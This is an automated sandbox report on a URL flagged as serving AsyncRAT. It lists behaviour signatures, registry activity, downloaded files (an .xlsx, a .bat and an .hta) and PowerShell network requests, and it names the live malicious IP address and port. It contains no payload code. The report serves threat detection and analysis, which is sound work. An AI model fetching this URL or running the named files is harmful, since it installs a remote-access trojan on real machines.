Malware Analysis Report

2025-01-02 12:09

Sample ID 240419-thj91age75
Target http://193.222.96.114:7287/
Tags
asyncrat default rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file http://193.222.96.114:7287/ was found to be: Known bad.

Malicious Activity Summary

asyncrat default rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Enumerates system info in registry

Modifies registry class

NTFS ADS

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-19 16:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-19 16:03

Reported

2024-04-19 16:07

Platform

win10v2004-20240412-en

Max time kernel

227s

Max time network

231s

Command Line

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://193.222.96.114:7287/"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Program Files\Mozilla Firefox\firefox.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\jiteon.xlsx:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\GoGi.bat:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\index.hta:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
